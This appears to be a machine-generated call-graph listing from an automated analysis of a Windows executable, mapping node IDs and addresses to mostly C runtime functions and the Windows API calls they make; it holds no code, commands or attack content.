SetRect 10493->10494 10495 b16edd 10493->10495 10497 b16eef 10494->10497 10496 b17040 7 API calls 10495->10496 10496->10497 10497->10461 10499 b16f61 _strlen 10498->10499 10501 b16fbc 10498->10501 10504 b17480 4 API calls 10499->10504 10500 b17480 4 API calls 10500->10501 10501->10500 10505 b16fa8 10501->10505 10504->10505 10534 b17660 10505->10534 10507 b17057 10506->10507 10508 b170b9 10507->10508 10509 b1709d 10507->10509 10511 b17086 10507->10511 10508->10511 10512 b16c80 4 API calls 10508->10512 10543 b13270 10509->10543 10511->10469 10516 b170dd 10512->10516 10513 b171f3 10547 b16c30 SetRect 10513->10547 10515 b17660 4 API calls 10515->10516 10516->10513 10516->10515 10517 b17480 WriteFile GetLastError WriteFile GetLastError 10516->10517 10517->10516 10519 b154c1 10518->10519 10520 b173be 10518->10520 10529 b131b0 10519->10529 10521 b17448 10520->10521 10522 b173ce 10520->10522 10523 b16c80 4 API calls 10521->10523 10526 b17433 10521->10526 10525 b17660 4 API calls 10522->10525 10523->10526 10524 b175b0 2 API calls 10524->10519 10527 b17403 10525->10527 10526->10524 10527->10526 10528 b17480 4 API calls 10527->10528 10528->10526 10530 b131d3 10529->10530 10531 b131e6 10529->10531 10530->10531 10532 b13205 SetTimer 10530->10532 10533 b13239 PostMessageW 10530->10533 10531->10427 10532->10531 10533->10531 10536 b17681 10534->10536 10535 b17035 10535->10464 10536->10535 10537 b17717 10536->10537 10538 b1784e 10536->10538 10541 b176b9 _strlen 10536->10541 10540 b17480 4 API calls 10537->10540 10537->10541 10539 b16c80 4 API calls 10538->10539 10538->10541 10539->10541 10540->10541 10541->10535 10542 b17480 4 API calls 10541->10542 10542->10535 10544 b1329b 10543->10544 10545 b131b0 2 API calls 10544->10545 10546 b13361 10545->10546 10546->10511 10547->10511 10549 b18c4d 10548->10549 10550 b18c38 10548->10550 10549->10227 10551 b20fdc 16 API calls 10550->10551 10551->10549 10554 b18ca7 10552->10554 10553 b12c13 LeaveCriticalSection 10553->10225 10553->10227 10554->10553 10555 b18c20 16 API calls 10554->10555 10555->10554 10557 b22602 10556->10557 10558 b22608 10556->10558 10560 b221cf _unexpected 6 API calls 10557->10560 10559 b2220e _unexpected 6 API calls 10558->10559 10562 b2260c SetLastError 10558->10562 10561 b22624 10559->10561 10560->10558 10561->10562 10564 b24871 _unexpected 14 API calls 10561->10564 10566 b226a1 10562->10566 10567 b2118c 10562->10567 10565 b22639 10564->10565 10568 b22652 10565->10568 10569 b22641 10565->10569 10570 b21bdc __FrameHandler3::FrameUnwindToState 48 API calls 10566->10570 10583 b21bdc 10567->10583 10573 b2220e _unexpected 6 API calls 10568->10573 10572 b2220e _unexpected 6 API calls 10569->10572 10571 b226a6 10570->10571 10574 b2264f 10572->10574 10575 b2265e 10573->10575 10579 b236c3 ___free_lconv_mon 14 API calls 10574->10579 10576 b22662 10575->10576 10577 b22679 10575->10577 10578 b2220e _unexpected 6 API calls 10576->10578 10580 b228fd _unexpected 14 API calls 10577->10580 10578->10574 10579->10562 10581 b22684 10580->10581 10582 b236c3 ___free_lconv_mon 14 API calls 10581->10582 10582->10562 10592 b23ab5 10583->10592 10586 b21bf6 IsProcessorFeaturePresent 10589 b21be1 10586->10589 10587 b1ff70 __FrameHandler3::FrameUnwindToState 23 API calls 10587->10589 10588 b237da __FrameHandler3::FrameUnwindToState 8 API calls 10588->10589 10589->10583 10589->10586 10589->10587 10589->10588 10591 b211b6 10589->10591 10595 b23adc 10589->10595 10622 b21c7c 10589->10622 10636 b23d39 10592->10636 10596 b23ae8 __FrameHandler3::FrameUnwindToState 10595->10596 10597 b2273d ___std_exception_copy 14 API calls 10596->10597 10598 b23b15 __FrameHandler3::FrameUnwindToState 10596->10598 10602 b23b0f __FrameHandler3::FrameUnwindToState 10596->10602 10597->10602 10605 b23b88 10598->10605 10647 b2255d EnterCriticalSection 10598->10647 10599 b23b5c 10600 b247e4 ___std_exception_copy 14 API calls 10599->10600 10601 b23b61 10600->10601 10603 b23796 ___std_exception_copy 29 API calls 10601->10603 10602->10598 10602->10599 10611 b23b46 10602->10611 10603->10611 10607 b23bca 10605->10607 10608 b23cbb 10605->10608 10619 b23bf9 10605->10619 10615 b225ec _unexpected 50 API calls 10607->10615 10607->10619 10610 b23cc6 10608->10610 10652 b22574 LeaveCriticalSection 10608->10652 10613 b1ff70 __FrameHandler3::FrameUnwindToState 23 API calls 10610->10613 10611->10589 10614 b23cce 10613->10614 10617 b23bee 10615->10617 10616 b225ec _unexpected 50 API calls 10620 b23c4e 10616->10620 10618 b225ec _unexpected 50 API calls 10617->10618 10618->10619 10648 b23c68 10619->10648 10620->10611 10621 b225ec _unexpected 50 API calls 10620->10621 10621->10611 10623 b21c85 10622->10623 10624 b21c88 GetLastError 10622->10624 10623->10589 10654 b25fc6 10624->10654 10627 b21d02 SetLastError 10627->10589 10628 b26001 ___vcrt_FlsSetValue 6 API calls 10629 b21cb6 __CreateFrameInfo 10628->10629 10630 b21cde 10629->10630 10631 b26001 ___vcrt_FlsSetValue 6 API calls 10629->10631 10635 b21cbc 10629->10635 10632 b26001 ___vcrt_FlsSetValue 6 API calls 10630->10632 10633 b21cf2 10630->10633 10631->10630 10632->10633 10634 b20f4d ___std_exception_destroy 14 API calls 10633->10634 10634->10635 10635->10627 10637 b23d45 __FrameHandler3::FrameUnwindToState 10636->10637 10642 b2255d EnterCriticalSection 10637->10642 10639 b23d53 10643 b23d91 10639->10643 10642->10639 10646 b22574 LeaveCriticalSection 10643->10646 10645 b23ada 10645->10589 10646->10645 10647->10605 10649 b23c6e 10648->10649 10651 b23c3f 10648->10651 10653 b22574 LeaveCriticalSection 10649->10653 10651->10611 10651->10616 10651->10620 10652->10610 10653->10651 10655 b260d1 ___vcrt_InitializeCriticalSectionEx 5 API calls 10654->10655 10656 b25fe0 10655->10656 10657 b25ff8 TlsGetValue 10656->10657 10658 b21c9d 10656->10658 10657->10658 10658->10627 10658->10628 10658->10635 10660 b2011e 10659->10660 10669 b2012f 10659->10669 10670 b1ffd9 GetModuleHandleW 10660->10670 10665 b1ff91 10665->9791 10677 b20273 10669->10677 10671 b1ffe5 10670->10671 10671->10669 10672 b2001c GetModuleHandleExW 10671->10672 10673 b2005b GetProcAddress 10672->10673 10674 b2006f 10672->10674 10673->10674 10675 b20082 FreeLibrary 10674->10675 10676 b2008b 10674->10676 10675->10676 10676->10669 10678 b2027f __FrameHandler3::FrameUnwindToState 10677->10678 10692 b2255d EnterCriticalSection 10678->10692 10680 b20289 10693 b20188 10680->10693 10682 b20296 10697 b202b4 10682->10697 10685 b200c0 10722 b2009e 10685->10722 10688 b200de 10690 b2001c __FrameHandler3::FrameUnwindToState 3 API calls 10688->10690 10689 b200ce GetCurrentProcess TerminateProcess 10689->10688 10691 b200e6 ExitProcess 10690->10691 10692->10680 10694 b20194 __FrameHandler3::FrameUnwindToState 10693->10694 10695 b201fb __FrameHandler3::FrameUnwindToState 10694->10695 10700 b207ae 10694->10700 10695->10682 10721 b22574 LeaveCriticalSection 10697->10721 10699 b20167 10699->10665 10699->10685 10701 b207ba __EH_prolog3 10700->10701 10704 b20a39 10701->10704 10703 b207e1 __FrameHandler3::FrameUnwindToState 10703->10695 10705 b20a45 __FrameHandler3::FrameUnwindToState 10704->10705 10712 b2255d EnterCriticalSection 10705->10712 10707 b20a53 10713 b20904 10707->10713 10712->10707 10714 b20923 10713->10714 10715 b2091b 10713->10715 10714->10715 10716 b236c3 ___free_lconv_mon 14 API calls 10714->10716 10717 b20a88 10715->10717 10716->10715 10720 b22574 LeaveCriticalSection 10717->10720 10719 b20a71 10719->10703 10720->10719 10721->10699 10727 b2418d GetPEB 10722->10727 10725 b200a8 GetPEB 10726 b200ba 10725->10726 10726->10688 10726->10689 10728 b200a3 10727->10728 10729 b241a7 10727->10729 10728->10725 10728->10726 10731 b22329 10729->10731 10732 b22434 _unexpected 5 API calls 10731->10732 10733 b22345 10732->10733 10733->10728 10735 b1fe74 10734->10735 10736 b1fe86 ___scrt_uninitialize_crt 10734->10736 10737 b1fe82 10735->10737 10739 b23d9d 10735->10739 10736->9857 10737->9857 10742 b23ecc 10739->10742 10745 b23fa5 10742->10745 10746 b23fb1 __FrameHandler3::FrameUnwindToState 10745->10746 10753 b2255d EnterCriticalSection 10746->10753 10748 b24027 10762 b24045 10748->10762 10751 b23fbb ___scrt_uninitialize_crt 10751->10748 10754 b23f19 10751->10754 10753->10751 10755 b23f25 __FrameHandler3::FrameUnwindToState 10754->10755 10765 b24051 EnterCriticalSection 10755->10765 10757 b23f68 10777 b23f99 10757->10777 10758 b23f2f ___scrt_uninitialize_crt 10758->10757 10766 b23da6 10758->10766 10879 b22574 LeaveCriticalSection 10762->10879 10764 b23da4 10764->10737 10765->10758 10767 b23dbb ___std_exception_copy 10766->10767 10768 b23dc2 10767->10768 10769 b23dcd 10767->10769 10770 b23ecc ___scrt_uninitialize_crt 79 API calls 10768->10770 10780 b23e0b 10769->10780 10774 b23dc8 ___std_exception_copy 10770->10774 10774->10757 10775 b23dee 10793 b264f5 10775->10793 10878 b24065 LeaveCriticalSection 10777->10878 10779 b23f87 10779->10751 10781 b23e24 10780->10781 10785 b23dd7 10780->10785 10782 b26614 ___scrt_uninitialize_crt 29 API calls 10781->10782 10781->10785 10783 b23e40 10782->10783 10804 b2683b 10783->10804 10785->10774 10786 b26614 10785->10786 10787 b26620 10786->10787 10788 b26635 10786->10788 10789 b247e4 ___std_exception_copy 14 API calls 10787->10789 10788->10775 10790 b26625 10789->10790 10791 b23796 ___std_exception_copy 29 API calls 10790->10791 10792 b26630 10791->10792 10792->10775 10794 b26506 10793->10794 10798 b26513 10793->10798 10795 b247e4 ___std_exception_copy 14 API calls 10794->10795 10803 b2650b 10795->10803 10796 b2655c 10797 b247e4 ___std_exception_copy 14 API calls 10796->10797 10800 b26561 10797->10800 10798->10796 10799 b2653a 10798->10799 10845 b26572 10799->10845 10802 b23796 ___std_exception_copy 29 API calls 10800->10802 10802->10803 10803->10774 10806 b26847 __FrameHandler3::FrameUnwindToState 10804->10806 10805 b2684f 10805->10785 10806->10805 10807 b2690b 10806->10807 10809 b2689c 10806->10809 10808 b23922 ___std_exception_copy 29 API calls 10807->10808 10808->10805 10815 b25dae EnterCriticalSection 10809->10815 10811 b268a2 10812 b268bf 10811->10812 10816 b2663b 10811->10816 10842 b26903 10812->10842 10815->10811 10817 b26660 10816->10817 10841 b26683 ___scrt_uninitialize_crt 10816->10841 10818 b26664 10817->10818 10820 b266c2 10817->10820 10819 b23922 ___std_exception_copy 29 API calls 10818->10819 10819->10841 10821 b266d9 10820->10821 10822 b2889c ___scrt_uninitialize_crt 31 API calls 10820->10822 10823 b26943 ___scrt_uninitialize_crt 51 API calls 10821->10823 10822->10821 10824 b266e3 10823->10824 10825 b26729 10824->10825 10826 b266e9 10824->10826 10827 b2678c WriteFile 10825->10827 10828 b2673d 10825->10828 10829 b26713 10826->10829 10830 b266f0 10826->10830 10831 b267ae GetLastError 10827->10831 10827->10841 10833 b26745 10828->10833 10834 b2677a 10828->10834 10832 b269c1 ___scrt_uninitialize_crt 56 API calls 10829->10832 10836 b26d93 ___scrt_uninitialize_crt 6 API calls 10830->10836 10830->10841 10831->10841 10832->10841 10835 b26768 10833->10835 10838 b2674a 10833->10838 10837 b26dfb ___scrt_uninitialize_crt 7 API calls 10834->10837 10839 b26fbf ___scrt_uninitialize_crt 8 API calls 10835->10839 10836->10841 10837->10841 10840 b26ed6 ___scrt_uninitialize_crt 7 API calls 10838->10840 10838->10841 10839->10841 10840->10841 10841->10812 10843 b25dd1 ___scrt_uninitialize_crt LeaveCriticalSection 10842->10843 10844 b26909 10843->10844 10844->10805 10846 b2657e __FrameHandler3::FrameUnwindToState 10845->10846 10858 b25dae EnterCriticalSection 10846->10858 10848 b2658d 10856 b265d2 10848->10856 10859 b25b65 10848->10859 10849 b247e4 ___std_exception_copy 14 API calls 10852 b265d9 10849->10852 10851 b265b9 FlushFileBuffers 10851->10852 10853 b265c5 GetLastError 10851->10853 10875 b26608 10852->10875 10872 b247f7 10853->10872 10856->10849 10858->10848 10860 b25b72 10859->10860 10861 b25b87 10859->10861 10862 b247f7 ___scrt_uninitialize_crt 14 API calls 10860->10862 10863 b247f7 ___scrt_uninitialize_crt 14 API calls 10861->10863 10865 b25bac 10861->10865 10864 b25b77 10862->10864 10866 b25bb7 10863->10866 10867 b247e4 ___std_exception_copy 14 API calls 10864->10867 10865->10851 10868 b247e4 ___std_exception_copy 14 API calls 10866->10868 10869 b25b7f 10867->10869 10870 b25bbf 10868->10870 10869->10851 10871 b23796 ___std_exception_copy 29 API calls 10870->10871 10871->10869 10873 b2273d ___std_exception_copy 14 API calls 10872->10873 10874 b247fc 10873->10874 10874->10856 10876 b25dd1 ___scrt_uninitialize_crt LeaveCriticalSection 10875->10876 10877 b265f1 10876->10877 10877->10803 10878->10779 10879->10764 11256 b22891 11257 b2289c 11256->11257 11261 b228ac 11256->11261 11262 b22996 11257->11262 11260 b236c3 ___free_lconv_mon 14 API calls 11260->11261 11263 b229b1 11262->11263 11264 b229ab 11262->11264 11266 b236c3 ___free_lconv_mon 14 API calls 11263->11266 11265 b236c3 ___free_lconv_mon 14 API calls 11264->11265 11265->11263 11267 b229bd 11266->11267 11268 b236c3 ___free_lconv_mon 14 API calls 11267->11268 11269 b229c8 11268->11269 11270 b236c3 ___free_lconv_mon 14 API calls 11269->11270 11271 b229d3 11270->11271 11272 b236c3 ___free_lconv_mon 14 API calls 11271->11272 11273 b229de 11272->11273 11274 b236c3 ___free_lconv_mon 14 API calls 11273->11274 11275 b229e9 11274->11275 11276 b236c3 ___free_lconv_mon 14 API calls 11275->11276 11277 b229f4 11276->11277 11278 b236c3 ___free_lconv_mon 14 API calls 11277->11278 11279 b229ff 11278->11279 11280 b236c3 ___free_lconv_mon 14 API calls 11279->11280 11281 b22a0a 11280->11281 11282 b236c3 ___free_lconv_mon 14 API calls 11281->11282 11283 b22a18 11282->11283 11288 b22b0f 11283->11288 11289 b22b1b __FrameHandler3::FrameUnwindToState 11288->11289 11304 b2255d EnterCriticalSection 11289->11304 11291 b22b4f 11305 b22b6e 11291->11305 11292 b22b25 11292->11291 11295 b236c3 ___free_lconv_mon 14 API calls 11292->11295 11295->11291 11296 b22b7a 11297 b22b86 __FrameHandler3::FrameUnwindToState 11296->11297 11309 b2255d EnterCriticalSection 11297->11309 11299 b22b90 11300 b228b2 _unexpected 14 API calls 11299->11300 11301 b22ba3 11300->11301 11310 b22bc3 11301->11310 11304->11292 11308 b22574 LeaveCriticalSection 11305->11308 11307 b22a3e 11307->11296 11308->11307 11309->11299 11313 b22574 LeaveCriticalSection 11310->11313 11312 b228a4 11312->11260 11313->11312 10887 b1d19e 10892 b1d720 SetUnhandledExceptionFilter 10887->10892 10889 b1d1a3 10893 b20f04 10889->10893 10891 b1d1ae 10892->10889 10894 b20f10 10893->10894 10895 b20f2a 10893->10895 10894->10895 10896 b247e4 ___std_exception_copy 14 API calls 10894->10896 10895->10891 10897 b20f1a 10896->10897 10898 b23796 ___std_exception_copy 29 API calls 10897->10898 10899 b20f25 10898->10899 10899->10891 11549 b264e6 11552 b22e6e 11549->11552 11553 b22ea9 11552->11553 11554 b22e77 11552->11554 11558 b226a7 11554->11558 11559 b226b2 11558->11559 11562 b226b8 11558->11562 11560 b221cf _unexpected 6 API calls 11559->11560 11560->11562 11561 b2220e _unexpected 6 API calls 11564 b226d2 11561->11564 11562->11561 11563 b226be 11562->11563 11565 b21bdc __FrameHandler3::FrameUnwindToState 50 API calls 11563->11565 11566 b226c3 11563->11566 11564->11563 11567 b24871 _unexpected 14 API calls 11564->11567 11568 b2273c 11565->11568 11583 b232b4 11566->11583 11569 b226e2 11567->11569 11570 b226ea 11569->11570 11571 b226ff 11569->11571 11573 b2220e _unexpected 6 API calls 11570->11573 11572 b2220e _unexpected 6 API calls 11571->11572 11575 b2270b 11572->11575 11574 b226f6 11573->11574 11578 b236c3 ___free_lconv_mon 14 API calls 11574->11578 11576 b2271e 11575->11576 11577 b2270f 11575->11577 11580 b228fd _unexpected 14 API calls 11576->11580 11579 b2220e _unexpected 6 API calls 11577->11579 11578->11563 11579->11574 11581 b22729 11580->11581 11582 b236c3 ___free_lconv_mon 14 API calls 11581->11582 11582->11566 11584 b232de 11583->11584 11605 b23140 11584->11605 11587 b232f7 11587->11553 11588 b248ce 15 API calls 11589 b23308 11588->11589 11590 b23310 11589->11590 11591 b2331e 11589->11591 11592 b236c3 ___free_lconv_mon 14 API calls 11590->11592 11612 b22f38 11591->11612 11592->11587 11595 b23356 11596 b247e4 ___std_exception_copy 14 API calls 11595->11596 11597 b2335b 11596->11597 11601 b236c3 ___free_lconv_mon 14 API calls 11597->11601 11598 b2339d 11600 b233e6 11598->11600 11623 b23676 11598->11623 11599 b23371 11599->11598 11602 b236c3 ___free_lconv_mon 14 API calls 11599->11602 11604 b236c3 ___free_lconv_mon 14 API calls 11600->11604 11601->11587 11602->11598 11604->11587 11631 b22eb6 11605->11631 11608 b23173 11610 b2318a 11608->11610 11611 b23178 GetACP 11608->11611 11609 b23161 GetOEMCP 11609->11610 11610->11587 11610->11588 11611->11610 11613 b23140 52 API calls 11612->11613 11614 b22f58 11613->11614 11615 b22f95 IsValidCodePage 11614->11615 11621 b22fd1 __FrameHandler3::FrameUnwindToState 11614->11621 11618 b22fa7 11615->11618 11615->11621 11616 b1db25 _ValidateLocalCookies 5 API calls 11617 b2313e 11616->11617 11617->11595 11617->11599 11619 b22fd6 GetCPInfo 11618->11619 11622 b22fb0 __FrameHandler3::FrameUnwindToState 11618->11622 11619->11621 11619->11622 11621->11616 11782 b234ca 11622->11782 11624 b23682 __FrameHandler3::FrameUnwindToState 11623->11624 11866 b2255d EnterCriticalSection 11624->11866 11626 b2368c 11867 b23409 11626->11867 11632 b22ed4 11631->11632 11633 b22ecd 11631->11633 11632->11633 11634 b225ec _unexpected 50 API calls 11632->11634 11633->11608 11633->11609 11635 b22ef5 11634->11635 11639 b25e8c 11635->11639 11640 b22f0b 11639->11640 11641 b25e9f 11639->11641 11643 b25eb9 11640->11643 11641->11640 11647 b24f4f 11641->11647 11644 b25ecc 11643->11644 11646 b25ee1 11643->11646 11644->11646 11779 b22e5b 11644->11779 11646->11633 11648 b24f5b __FrameHandler3::FrameUnwindToState 11647->11648 11649 b225ec _unexpected 50 API calls 11648->11649 11650 b24f64 11649->11650 11651 b24faa 11650->11651 11660 b2255d EnterCriticalSection 11650->11660 11651->11640 11653 b24f82 11661 b24fd0 11653->11661 11658 b21bdc __FrameHandler3::FrameUnwindToState 50 API calls 11659 b24fcf 11658->11659 11660->11653 11662 b24fde _unexpected 11661->11662 11664 b24f93 11661->11664 11662->11664 11668 b24d84 11662->11668 11665 b24faf 11664->11665 11778 b22574 LeaveCriticalSection 11665->11778 11667 b24fa6 11667->11651 11667->11658 11669 b24e04 11668->11669 11671 b24d9a 11668->11671 11672 b236c3 ___free_lconv_mon 14 API calls 11669->11672 11695 b24e52 11669->11695 11671->11669 11675 b236c3 ___free_lconv_mon 14 API calls 11671->11675 11691 b24dcd 11671->11691 11673 b24e26 11672->11673 11674 b236c3 ___free_lconv_mon 14 API calls 11673->11674 11676 b24e39 11674->11676 11680 b24dc2 11675->11680 11682 b236c3 ___free_lconv_mon 14 API calls 11676->11682 11677 b236c3 ___free_lconv_mon 14 API calls 11678 b24df9 11677->11678 11683 b236c3 ___free_lconv_mon 14 API calls 11678->11683 11679 b24ec0 11684 b236c3 ___free_lconv_mon 14 API calls 11679->11684 11696 b24574 11680->11696 11681 b236c3 ___free_lconv_mon 14 API calls 11687 b24de4 11681->11687 11688 b24e47 11682->11688 11683->11669 11689 b24ec6 11684->11689 11685 b236c3 14 API calls ___free_lconv_mon 11690 b24e60 11685->11690 11724 b24672 11687->11724 11693 b236c3 ___free_lconv_mon 14 API calls 11688->11693 11689->11664 11690->11679 11690->11685 11691->11681 11694 b24def 11691->11694 11693->11695 11694->11677 11736 b24f1e 11695->11736 11697 b24585 11696->11697 11723 b2466e 11696->11723 11698 b24596 11697->11698 11699 b236c3 ___free_lconv_mon 14 API calls 11697->11699 11700 b236c3 ___free_lconv_mon 14 API calls 11698->11700 11703 b245a8 11698->11703 11699->11698 11700->11703 11701 b245ba 11702 b245cc 11701->11702 11705 b236c3 ___free_lconv_mon 14 API calls 11701->11705 11706 b245de 11702->11706 11707 b236c3 ___free_lconv_mon 14 API calls 11702->11707 11703->11701 11704 b236c3 ___free_lconv_mon 14 API calls 11703->11704 11704->11701 11705->11702 11708 b245f0 11706->11708 11709 b236c3 ___free_lconv_mon 14 API calls 11706->11709 11707->11706 11710 b24602 11708->11710 11712 b236c3 ___free_lconv_mon 14 API calls 11708->11712 11709->11708 11711 b24614 11710->11711 11713 b236c3 ___free_lconv_mon 14 API calls 11710->11713 11714 b24626 11711->11714 11715 b236c3 ___free_lconv_mon 14 API calls 11711->11715 11712->11710 11713->11711 11716 b24638 11714->11716 11717 b236c3 ___free_lconv_mon 14 API calls 11714->11717 11715->11714 11718 b2464a 11716->11718 11720 b236c3 ___free_lconv_mon 14 API calls 11716->11720 11717->11716 11719 b2465c 11718->11719 11721 b236c3 ___free_lconv_mon 14 API calls 11718->11721 11722 b236c3 ___free_lconv_mon 14 API calls 11719->11722 11719->11723 11720->11718 11721->11719 11722->11723 11723->11691 11725 b2467f 11724->11725 11735 b246d7 11724->11735 11726 b2468f 11725->11726 11727 b236c3 ___free_lconv_mon 14 API calls 11725->11727 11728 b246a1 11726->11728 11729 b236c3 ___free_lconv_mon 14 API calls 11726->11729 11727->11726 11730 b246b3 11728->11730 11731 b236c3 ___free_lconv_mon 14 API calls 11728->11731 11729->11728 11732 b236c3 ___free_lconv_mon 14 API calls 11730->11732 11734 b246c5 11730->11734 11731->11730 11732->11734 11733 b236c3 ___free_lconv_mon 14 API calls 11733->11735 11734->11733 11734->11735 11735->11694 11737 b24f2b 11736->11737 11738 b24f4a 11736->11738 11737->11738 11742 b246db 11737->11742 11738->11690 11741 b236c3 ___free_lconv_mon 14 API calls 11741->11738 11743 b247b9 11742->11743 11744 b246ec 11742->11744 11743->11741 11745 b247bf _unexpected 14 API calls 11744->11745 11746 b246f4 11745->11746 11747 b247bf _unexpected 14 API calls 11746->11747 11748 b246ff 11747->11748 11749 b247bf _unexpected 14 API calls 11748->11749 11750 b2470a 11749->11750 11751 b247bf _unexpected 14 API calls 11750->11751 11752 b24715 11751->11752 11753 b247bf _unexpected 14 API calls 11752->11753 11754 b24723 11753->11754 11755 b236c3 ___free_lconv_mon 14 API calls 11754->11755 11756 b2472e 11755->11756 11757 b236c3 ___free_lconv_mon 14 API calls 11756->11757 11758 b24739 11757->11758 11759 b236c3 ___free_lconv_mon 14 API calls 11758->11759 11760 b24744 11759->11760 11761 b247bf _unexpected 14 API calls 11760->11761 11762 b24752 11761->11762 11763 b247bf _unexpected 14 API calls 11762->11763 11764 b24760 11763->11764 11765 b247bf _unexpected 14 API calls 11764->11765 11766 b24771 11765->11766 11767 b247bf _unexpected 14 API calls 11766->11767 11768 b2477f 11767->11768 11769 b247bf _unexpected 14 API calls 11768->11769 11770 b2478d 11769->11770 11771 b236c3 ___free_lconv_mon 14 API calls 11770->11771 11772 b24798 11771->11772 11773 b236c3 ___free_lconv_mon 14 API calls 11772->11773 11774 b247a3 11773->11774 11775 b236c3 ___free_lconv_mon 14 API calls 11774->11775 11776 b247ae 11775->11776 11777 b236c3 ___free_lconv_mon 14 API calls 11776->11777 11777->11743 11778->11667 11780 b225ec _unexpected 50 API calls 11779->11780 11781 b22e60 11780->11781 11781->11646 11783 b234f2 GetCPInfo 11782->11783 11784 b235bb 11782->11784 11783->11784 11790 b2350a 11783->11790 11785 b1db25 _ValidateLocalCookies 5 API calls 11784->11785 11787 b23674 11785->11787 11787->11621 11793 b24b01 11790->11793 11792 b262af 54 API calls 11792->11784 11794 b22eb6 50 API calls 11793->11794 11795 b24b21 11794->11795 11813 b24c0a 11795->11813 11797 b24be5 11800 b1db25 _ValidateLocalCookies 5 API calls 11797->11800 11798 b24bdd 11816 b24ae1 11798->11816 11799 b24b4e 11799->11797 11799->11798 11802 b248ce 15 API calls 11799->11802 11804 b24b73 __FrameHandler3::FrameUnwindToState 11799->11804 11803 b23572 11800->11803 11802->11804 11808 b262af 11803->11808 11804->11798 11805 b24c0a ___scrt_uninitialize_crt MultiByteToWideChar 11804->11805 11806 b24bbe 11805->11806 11806->11798 11807 b24bc9 GetStringTypeW 11806->11807 11807->11798 11809 b22eb6 50 API calls 11808->11809 11810 b262c2 11809->11810 11820 b262f8 11810->11820 11814 b24c1b MultiByteToWideChar 11813->11814 11814->11799 11817 b24afe 11816->11817 11818 b24aed 11816->11818 11817->11797 11818->11817 11819 b236c3 ___free_lconv_mon 14 API calls 11818->11819 11819->11817 11821 b26313 11820->11821 11822 b24c0a ___scrt_uninitialize_crt MultiByteToWideChar 11821->11822 11826 b26359 11822->11826 11823 b264d1 11824 b1db25 _ValidateLocalCookies 5 API calls 11823->11824 11825 b23593 11824->11825 11825->11792 11826->11823 11827 b248ce 15 API calls 11826->11827 11829 b2637f 11826->11829 11836 b26405 11826->11836 11827->11829 11828 b24ae1 __freea 14 API calls 11828->11823 11830 b24c0a ___scrt_uninitialize_crt MultiByteToWideChar 11829->11830 11829->11836 11831 b263c4 11830->11831 11831->11836 11848 b2229b 11831->11848 11834 b263f6 11834->11836 11840 b2229b 6 API calls 11834->11840 11835 b2642e 11837 b264b9 11835->11837 11838 b248ce 15 API calls 11835->11838 11841 b26440 11835->11841 11836->11828 11839 b24ae1 __freea 14 API calls 11837->11839 11838->11841 11839->11836 11840->11836 11841->11837 11842 b2229b 6 API calls 11841->11842 11843 b26483 11842->11843 11843->11837 11854 b25a29 11843->11854 11845 b2649d 11845->11837 11846 b264a6 11845->11846 11847 b24ae1 __freea 14 API calls 11846->11847 11847->11836 11857 b224b7 11848->11857 11852 b222ec LCMapStringW 11853 b222ac 11852->11853 11853->11834 11853->11835 11853->11836 11856 b25a40 WideCharToMultiByte 11854->11856 11856->11845 11858 b22434 _unexpected 5 API calls 11857->11858 11859 b222a6 11858->11859 11859->11853 11860 b222f8 11859->11860 11863 b224d1 11860->11863 11862 b22303 11862->11852 11864 b22434 _unexpected 5 API calls 11863->11864 11865 b224e7 11864->11865 11865->11862 11866->11626 11877 b22dda 11867->11877 11869 b2342b 11870 b22dda 29 API calls 11869->11870 11871 b2344a 11870->11871 11872 b236c3 ___free_lconv_mon 14 API calls 11871->11872 11873 b23471 11871->11873 11872->11873 11874 b236b7 11873->11874 11891 b22574 LeaveCriticalSection 11874->11891 11876 b236a5 11876->11600 11878 b22deb 11877->11878 11881 b22de7 CatchIt 11877->11881 11879 b22df2 11878->11879 11883 b22e05 __FrameHandler3::FrameUnwindToState 11878->11883 11880 b247e4 ___std_exception_copy 14 API calls 11879->11880 11882 b22df7 11880->11882 11881->11869 11884 b23796 ___std_exception_copy 29 API calls 11882->11884 11883->11881 11885 b22e33 11883->11885 11886 b22e3c 11883->11886 11884->11881 11887 b247e4 ___std_exception_copy 14 API calls 11885->11887 11886->11881 11888 b247e4 ___std_exception_copy 14 API calls 11886->11888 11889 b22e38 11887->11889 11888->11889 11890 b23796 ___std_exception_copy 29 API calls 11889->11890 11890->11881 11891->11876 11917 b1d0eb 11918 b1d0f3 11917->11918 11936 b20ec0 11918->11936 11920 b1d0fe 11943 b1d4bc 11920->11943 11922 b1d72c 4 API calls 11924 b1d195 11922->11924 11923 b1d113 __RTC_Initialize 11934 b1d170 11923->11934 11949 b1d336 11923->11949 11926 b1d12c 11952 b203c2 11926->11952 11930 b1d142 11978 b1d63b 11930->11978 11932 b1d165 11984 b202cb 11932->11984 11934->11922 11935 b1d18d 11934->11935 11937 b20ef2 11936->11937 11938 b20ecf 11936->11938 11937->11920 11938->11937 11939 b247e4 ___std_exception_copy 14 API calls 11938->11939 11940 b20ee2 11939->11940 11941 b23796 ___std_exception_copy 29 API calls 11940->11941 11942 b20eed 11941->11942 11942->11920 11944 b1d4c8 11943->11944 11945 b1d4cc 11943->11945 11944->11923 11946 b1d72c 4 API calls 11945->11946 11948 b1d4d9 ___scrt_release_startup_lock 11945->11948 11947 b1d542 11946->11947 11948->11923 11991 b1d34b 11949->11991 11953 b2041c 11952->11953 11954 b20454 GetModuleFileNameW 11953->11954 11955 b2043e 11953->11955 11969 b1d137 11953->11969 11959 b20479 11954->11959 11956 b247e4 ___std_exception_copy 14 API calls 11955->11956 11957 b20443 11956->11957 11958 b23796 ___std_exception_copy 29 API calls 11957->11958 11958->11969 12054 b203cd 11959->12054 11962 b204bb 11965 b204b4 11962->11965 11966 b204f5 11962->11966 11963 b204af 11964 b247e4 ___std_exception_copy 14 API calls 11963->11964 11964->11965 11967 b236c3 ___free_lconv_mon 14 API calls 11965->11967 12060 b25020 11966->12060 11967->11969 11969->11934 11977 b1d62c InitializeSListHead 11969->11977 11971 b20516 11975 b236c3 ___free_lconv_mon 14 API calls 11971->11975 11972 b2050c 11973 b236c3 ___free_lconv_mon 14 API calls 11972->11973 11974 b20514 11973->11974 11976 b236c3 ___free_lconv_mon 14 API calls 11974->11976 11975->11974 11976->11969 11977->11930 12170 b206f3 11978->12170 11980 b1d64c 11981 b1d653 11980->11981 11982 b1d72c 4 API calls 11980->11982 11981->11932 11983 b1d65b 11982->11983 11985 b225ec _unexpected 50 API calls 11984->11985 11986 b202d6 11985->11986 11987 b2030e 11986->11987 11988 b247e4 ___std_exception_copy 14 API calls 11986->11988 11987->11934 11989 b20303 11988->11989 11990 b23796 ___std_exception_copy 29 API calls 11989->11990 11990->11987 11992 b1d361 11991->11992 11993 